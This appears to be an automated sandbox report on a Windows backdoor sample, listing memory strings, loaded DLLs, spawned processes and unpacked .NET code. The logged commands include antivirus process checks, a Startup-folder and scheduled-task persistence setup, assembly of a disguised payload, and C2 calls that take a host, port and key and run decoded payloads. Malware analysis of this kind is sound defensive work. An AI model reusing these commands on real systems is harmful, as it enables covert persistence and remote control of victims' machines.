Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe
String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe
String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe
String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe
String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, Tramadol.0.dr, EcoScape.pif.11.dr
String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, Tramadol.0.dr, EcoScape.pif.11.dr
String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, EcoScape.pif.11.dr, Plugins.0.dr
String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, Tramadol.0.dr, EcoScape.pif.11.dr
String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, EcoScape.pif.11.dr, Plugins.0.dr
String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe
String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe
String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe
String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe
String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe
String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe
String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe
String found in binary or memory: http://ocsp.digicert.com0
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe
String found in binary or memory: http://ocsp.digicert.com0A
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe
String found in binary or memory: http://ocsp.digicert.com0C
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe
String found in binary or memory: http://ocsp.digicert.com0X
Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, Tramadol.0.dr, EcoScape.pif.11.dr
String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, Tramadol.0.dr, EcoScape.pif.11.dr
String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, Tramadol.0.dr, EcoScape.pif.11.dr, Plugins.0.dr
String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, EcoScape.pif.11.dr, Plugins.0.dr
String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, Tramadol.0.dr, EcoScape.pif.11.dr
String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, Tramadol.0.dr, EcoScape.pif.11.dr
String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: Telecom.pif, 0000000B.00000000.1216712688.0000000000515000.00000002.00000001.01000000.00000006.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, EcoScape.pif, 00000013.00000000.1232198341.0000000000515000.00000002.00000001.01000000.00000009.sdmp, EcoScape.pif, 0000001D.00000002.1397522322.0000000000515000.00000002.00000001.01000000.00000009.sdmp, EcoScape.pif, 00000027.00000000.1816275149.0000000000515000.00000002.00000001.01000000.00000009.sdmp, Telecom.pif.9.dr, EcoScape.pif.11.dr, Commander.0.dr
String found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe
String found in binary or memory: http://www.digicert.com/CPS0
Source: RegAsm.exe, 00000022.00000002.2442532871.0000000002D11000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory: https://pastebin.com/raw/Dh8E7H3R
Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, Tramadol.0.dr, EcoScape.pif.11.dr
String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: EcoScape.pif.11.dr, Plugins.0.dr
String found in binary or memory: https://www.globalsign.com/repository/0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe
Section loaded: uxtheme.dll, userenv.dll, apphelp.dll, propsys.dll, dwmapi.dll, cryptbase.dll, oleacc.dll, ntmarta.dll, version.dll, shfolder.dll, kernel.appcore.dll, windows.storage.dll, wldp.dll, profapi.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe
Section loaded: cmdext.dll, apphelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe
Section loaded: version.dll, mpr.dll, framedynos.dll, dbghelp.dll, sspicli.dll, srvcli.dll, netutils.dll, sspicli.dll, kernel.appcore.dll, wbemcomn.dll, winsta.dll, amsi.dll, userenv.dll, profapi.dll
Source: C:\Windows\SysWOW64\tasklist.exe
Section loaded: version.dll, mpr.dll, framedynos.dll, dbghelp.dll, sspicli.dll, srvcli.dll, netutils.dll, sspicli.dll, kernel.appcore.dll, wbemcomn.dll, winsta.dll, amsi.dll, userenv.dll, profapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif
Section loaded: wsock32.dll, version.dll, winmm.dll, mpr.dll, wininet.dll, iphlpapi.dll, userenv.dll, uxtheme.dll, kernel.appcore.dll, windows.storage.dll, wldp.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, mswsock.dll, dnsapi.dll, winrnr.dll, rasadhlp.dll, ntmarta.dll, apphelp.dll
Source: C:\Windows\SysWOW64\PING.EXE
Section loaded: iphlpapi.dll, winnsi.dll, mswsock.dll
Source: C:\Windows\SysWOW64\schtasks.exe
Section loaded: kernel.appcore.dll, taskschd.dll, sspicli.dll, xmllite.dll
Source: C:\Windows\System32\wscript.exe
Section loaded: version.dll, kernel.appcore.dll, uxtheme.dll, sxs.dll, jscript.dll, iertutil.dll, amsi.dll, userenv.dll, profapi.dll, wldp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, msisip.dll, wshext.dll, scrobj.dll, mpr.dll, scrrun.dll, windows.storage.dll, propsys.dll, windows.staterepositoryps.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, apphelp.dll, twext.dll, cscui.dll, edputil.dll, urlmon.dll, srvcli.dll, netutils.dll, sspicli.dll, wintypes.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif
Section loaded: wsock32.dll, version.dll, winmm.dll, mpr.dll, wininet.dll, iphlpapi.dll, userenv.dll, uxtheme.dll, kernel.appcore.dll, windows.storage.dll, wldp.dll
Source: C:\Windows\System32\wscript.exe
Section loaded: version.dll, kernel.appcore.dll, uxtheme.dll, sxs.dll, jscript.dll, iertutil.dll, amsi.dll, userenv.dll, profapi.dll, wldp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, msisip.dll, wshext.dll, scrobj.dll, mpr.dll, scrrun.dll, windows.storage.dll, propsys.dll, windows.staterepositoryps.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, apphelp.dll, twext.dll, cscui.dll, edputil.dll, urlmon.dll, srvcli.dll, netutils.dll, sspicli.dll, wintypes.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif
Section loaded: wsock32.dll, version.dll, winmm.dll, mpr.dll, wininet.dll, iphlpapi.dll, userenv.dll, uxtheme.dll, kernel.appcore.dll, windows.storage.dll, wldp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe
Section loaded: mscoree.dll, apphelp.dll, aclayers.dll, mpr.dll, sfc.dll, sfc_os.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, wtsapi32.dll, winsta.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, sspicli.dll
Source: C:\Windows\System32\wscript.exe
Section loaded: version.dll, kernel.appcore.dll, uxtheme.dll, sxs.dll, jscript.dll, iertutil.dll, amsi.dll, userenv.dll, profapi.dll, wldp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, msisip.dll, wshext.dll, scrobj.dll, mpr.dll, scrrun.dll, windows.storage.dll, propsys.dll, windows.staterepositoryps.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, apphelp.dll, twext.dll, cscui.dll, edputil.dll, urlmon.dll, srvcli.dll, netutils.dll, sspicli.dll, wintypes.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif
Section loaded: wsock32.dll, version.dll, winmm.dll, mpr.dll, wininet.dll, iphlpapi.dll, userenv.dll, uxtheme.dll, kernel.appcore.dll, windows.storage.dll, wldp.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe |
Section loaded: mpclient.dll |
|
Source: C:\Program Files\Windows Defender\MpCmdRun.exe |
Section loaded: secur32.dll |
|
Source: C:\Program Files\Windows Defender\MpCmdRun.exe |
Section loaded: sspicli.dll |
|
Source: C:\Program Files\Windows Defender\MpCmdRun.exe |
Section loaded: version.dll |
|
Source: C:\Program Files\Windows Defender\MpCmdRun.exe |
Section loaded: msasn1.dll |
|
Source: C:\Program Files\Windows Defender\MpCmdRun.exe |
Section loaded: kernel.appcore.dll |
|
Source: C:\Program Files\Windows Defender\MpCmdRun.exe |
Section loaded: userenv.dll |
|
Source: C:\Program Files\Windows Defender\MpCmdRun.exe |
Section loaded: gpapi.dll |
|
Source: C:\Program Files\Windows Defender\MpCmdRun.exe |
Section loaded: wbemcomn.dll |
|
Source: C:\Program Files\Windows Defender\MpCmdRun.exe |
Section loaded: amsi.dll |
|
Source: C:\Program Files\Windows Defender\MpCmdRun.exe |
Section loaded: profapi.dll |
|
Source: C:\Program Files\Windows Defender\MpCmdRun.exe |
Section loaded: wscapi.dll |
|
Source: C:\Program Files\Windows Defender\MpCmdRun.exe |
Section loaded: urlmon.dll |
|
Source: C:\Program Files\Windows Defender\MpCmdRun.exe |
Section loaded: iertutil.dll |
|
Source: C:\Program Files\Windows Defender\MpCmdRun.exe |
Section loaded: srvcli.dll |
|
Source: C:\Program Files\Windows Defender\MpCmdRun.exe |
Section loaded: netutils.dll |
|
Source: C:\Program Files\Windows Defender\MpCmdRun.exe |
Section loaded: slc.dll |
|
Source: C:\Program Files\Windows Defender\MpCmdRun.exe |
Section loaded: sppc.dll |
|
Source: unknown |
Process created: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe "C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe" |
|
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe |
Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Cutting Cutting.bat & Cutting.bat |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\tasklist.exe tasklist |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe" |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\tasklist.exe tasklist |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 23855 |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Northeast + Cameras + Papers + Friends + Fears + Commander + Tramadol + Plugins 23855\Telecom.pif |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Stream + Keyboard 23855\R |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif 23855\Telecom.pif 23855\R |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1 |
|
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif |
Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoScape.url" & echo URL="C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoScape.url" & exit |
|
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif |
Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Impaired" /tr "wscript //B 'C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js'" /sc minute /mo 3 /F |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Impaired" /tr "wscript //B 'C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js'" /sc minute /mo 3 /F |
|
Source: unknown |
Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif" "C:\Users\user\AppData\Local\EcoVision Dynamics\A" |
|
Source: unknown |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif" "C:\Users\user\AppData\Local\EcoVision Dynamics\A" |
|
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif |
Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe |
|
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif |
Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe |
|
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe |
Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1180 -s 1068 |
|
Source: unknown |
Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif" "C:\Users\user\AppData\Local\EcoVision Dynamics\A" |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable |
|
Source: C:\Program Files\Windows Defender\MpCmdRun.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe |
Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Cutting Cutting.bat & Cutting.bat |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\tasklist.exe tasklist |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe" |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\tasklist.exe tasklist |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 23855 |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Northeast + Cameras + Papers + Friends + Fears + Commander + Tramadol + Plugins 23855\Telecom.pif |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Stream + Keyboard 23855\R |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif 23855\Telecom.pif 23855\R |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1 |
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif |
Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoScape.url" & echo URL="C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoScape.url" & exit |
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif |
Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Impaired" /tr "wscript //B 'C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js'" /sc minute /mo 3 /F |
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif |
Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe |
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif |
Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Impaired" /tr "wscript //B 'C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js'" /sc minute /mo 3 /F |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif" "C:\Users\user\AppData\Local\EcoVision Dynamics\A" |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif" "C:\Users\user\AppData\Local\EcoVision Dynamics\A" |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif" "C:\Users\user\AppData\Local\EcoVision Dynamics\A" |
|
Source: 11.3.Telecom.pif.4552c30.3.raw.unpack, Messages.cs |
.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true) |
Source: 11.3.Telecom.pif.4552c30.3.raw.unpack, Messages.cs |
.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true) |
Source: 11.2.Telecom.pif.4552c30.4.raw.unpack, Messages.cs |
.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true) |
Source: 11.2.Telecom.pif.4552c30.4.raw.unpack, Messages.cs |
.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true) |
Source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, Messages.cs |
.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true) |
Source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, Messages.cs |
.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true) |
Source: 11.3.Telecom.pif.4552c30.2.raw.unpack, Messages.cs |
.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true) |
Source: 11.3.Telecom.pif.4552c30.2.raw.unpack, Messages.cs |
.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true) |
Source: 11.3.Telecom.pif.454d480.1.raw.unpack, Messages.cs |
.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true) |
Source: 11.3.Telecom.pif.454d480.1.raw.unpack, Messages.cs |
.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true) |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\cmd.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\tasklist.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\tasklist.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif |
Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX |
Source: C:\Windows\System32\wscript.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\wscript.exe |
Process information set: NOOPENFILEERRORBOX |
